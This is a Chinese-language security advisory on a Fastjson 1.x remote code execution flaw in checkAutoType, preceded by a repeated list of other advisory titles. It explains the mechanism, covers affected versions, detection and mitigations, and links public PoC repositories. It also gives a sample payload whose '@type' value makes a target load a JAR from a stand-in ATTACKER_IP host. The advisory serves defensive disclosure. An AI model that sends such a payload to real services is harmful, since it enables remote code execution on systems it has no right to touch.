-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
-
- 关于Fastjson远程代码执行漏洞的安全告知
- 关于社会化分享工具bshare遭供应链投毒攻击的安全排查预警
- 关于NGINX Rift远程代码执行漏洞(CVE-2026-42945)的安全告知
- 关于Linux内核crypto子系统本地内存损坏漏洞(CVE-2026-31431)的安全告知
- 关于Apache Tomcat远程代码执行漏洞(CVE-2026-34486)安全告知
- 关于BlueHammer Windows Defender 本地权限提升零日漏洞的安全告知
- 关于Apache ActiveMQ Jolokia 远程代码执行漏洞(CVE-2026-34197)的安全告知
- 关于森鑫炬水务企业综合运营平台Instance_Get任意文件读取漏洞的安全告知
- 关于帆软报表export/excel SQL远程代码执行漏洞的安全告知
- 关于Redis 远程代码执行漏洞(CVE-2025-49844)的安全告知
关于Fastjson远程代码执行漏洞的安全告知
时间:2026-07-22 11:34:36来源:信息安全部作者:梦之想科技
漏洞详情
Fastjson 远程代码执行是Fastjson 1.x系列checkAutoType方法存在的远程代码执行漏洞,由ParserConfig.checkAutoType()资源探测逻辑缺陷导致,攻击者可通过构造恶意@type值触发远程类加载,实现无需Gadget依赖的未认证远程代码执行。
Fastjson 1.2.66至1.2.83全版本存在严重远程代码执行漏洞,攻击者仅需发送单个JSON.parse()请求即可在类型绑定前触发RCE,无需落地文件、出网加载远程类,可轻松绕过HIDS、EDR及WAF,甚至在K8s环境中实现容器逃逸与横向渗透。该漏洞颠覆了1.2.83作为“安全最终版”的普遍认知,且大量政企、金融、能源及互联网系统仍长期依赖Fastjson 1.x并误将AutoType视为有效防御,导致攻击面广泛暴露。
Fastjson的ParserConfig.checkAutoType()方法在处理每个@type值时会被调用。在AutoType关闭时,Fastjson并未完全放弃对类型名的处理,checkAutoType中保留了一段资源探测逻辑:将类型名中的点号替换为斜杠并拼接".class"后缀后,通过ClassLoader.getResourceAsStream()加载该资源,使用内置ASM ClassReader扫描字节码以判断是否存在@JSONType注解。若探测成功且字节码携带@JSONType注解,则jsonType标志为true,会打开loadClass分支,最终通过TypeUtils.loadClass()完成远程类的定义与初始化。
攻击者无需任何认证权限,无需开启AutoType支持,无需寻找传统反序列化Gadget链。仅需向目标服务发送一条包含恶意@type值的JSON.parse()请求即可触发漏洞。基础Payload形如:{"@type":"jar:http://ATTACKER_IP:8000/probe!.POC","x":1}。攻击者搭建恶意HTTP服务器提供包含@JSONType注解的JAR文件,目标服务收到Payload后经由checkAutoType的资源探测逻辑发起出网HTTP请求拉取远程JAR,defineClass后远程类<clinit>静态块自动执行,完成RCE。
影响范围
该漏洞代码于1.2.66版本引入Fastjson源码,影响Fastjson 1.2.66至1.2.83所有未修复版本,涵盖所有使用Fastjson 1.x系列进行JSON解析的Java应用程序。所有基于Spring Boot FatJar/可执行JAR方式部署(即使用LaunchedURLClassLoader)且运行于JDK 8环境的应用为完整RCE高危组合。JDK 9及以上环境虽无法完整实现RCE,但仍存在SSRF风险,可用于内网探测与二次渗透。同时覆盖所有使用Fastjson 1.x解析不可信JSON输入的微服务、API网关、消息中间件及大数据组件。
漏洞复现
实验环境采用 JDK 8,具体版本为 1.8.0_321。Fastjson版本为1.2.83,模拟生产环境中广泛使用的未修复版本。
复现截图:
排查方法
Fastjson版本自查排查:
排查所有Java项目及应用程序中使用的Fastjson依赖版本。检查pom.xml、build.gradle、lib目录或JAR包清单文件中Fastjson的版本号,如版本处于1.2.66-1.2.83区间且未修复,即可判定存在漏洞风险。重点核查外网暴露的Web服务、Spring Boot应用、API网关及微服务节点等核心资产。
高危配置与运行环境排查:
确认应用是否以Spring Boot FatJar/可执行JAR方式部署运行(即使用LaunchedURLClassLoader),确认应用是否运行于JDK 8环境,确认应用是否存在使用Fastjson解析不可信外部JSON输入的业务接口。同时排查ParserConfig中是否未启用SafeMode、defaultClassLoader是否指向可解析远程URL的ClassLoader。
修复建议
1.启用SafeMode彻底禁用@type处理。优先在所有使用Fastjson 1.x的Java应用启动参数中添加-Dfastjson.parser.safeMode=true,或在ParserConfig中全局启用SafeMode,完全禁用@type自动类型处理,从源头彻底阻断漏洞触发路径。这是当前最直接有效的缓解措施,适用于无法立即升级或迁移的场景。
2.迁移至Fastjson 2.x。彻底脱离Fastjson 1.x系列,将项目依赖升级至Fastjson 2.x版本(如fastjson2),该版本重构了类型处理机制,不再受此漏洞影响。所有新项目建议直接采用Fastjson 2.x或Jackson等替代库。
3.限制应用出站HTTP访问权限。在服务器及容器层面严格限制Java进程的出站网络访问,通过防火墙、安全组等策略默认拒绝应用对外部HTTP/HTTPS服务的访问。仅放行业务必需的出站域名,阻断攻击者SSRF远程拉取恶意JAR的利用路径。
4.升级运行环境至JDK 9+。对于无法禁用@type处理或无法迁移至Fastjson 2.x的业务,升级JDK运行环境至JDK 9及以上版本。高版本JDK在defineClass阶段会对不合法的类名称格式进行校验,完整RCE将降级为SSRF(SSRF风险仍需关注与治理)。
5.部署WAF规则拦截恶意Payload。在WAF、API网关、云防护处配置精细化访问控制规则,重点拦截JSON请求@type字段中包含jar:协议前缀、感叹号!、连续点号..、整数IP格式(如2130706433)的恶意请求。
6.常态化资产梳理与安全巡检。针对全网Fastjson存量资产、老旧Java应用、未及时迭代的业务系统开展专项排查,统计未启用SafeMode、未迁移至Fastjson 2.x的脆弱节点,建立整改台账。定期监测外网暴露的JSON解析服务接口,拦截批量扫描与漏洞探测行为,防范黑产利用公开PoC开展全网批量爆破与供应链入侵攻击。
产品支持
实战化攻防技能演训平台:模拟真实攻防仿真场景,提升蓝军、红军实战应对能力训练平台。
参考资料
https://github.com/wouijvziqy/Fastjson-JsonType-RCE-PoC
https://github.com/ThanatosXingYu/2026FastjsonPoC
https://github.com/dinosn/fastjson-jsontype-rce-lab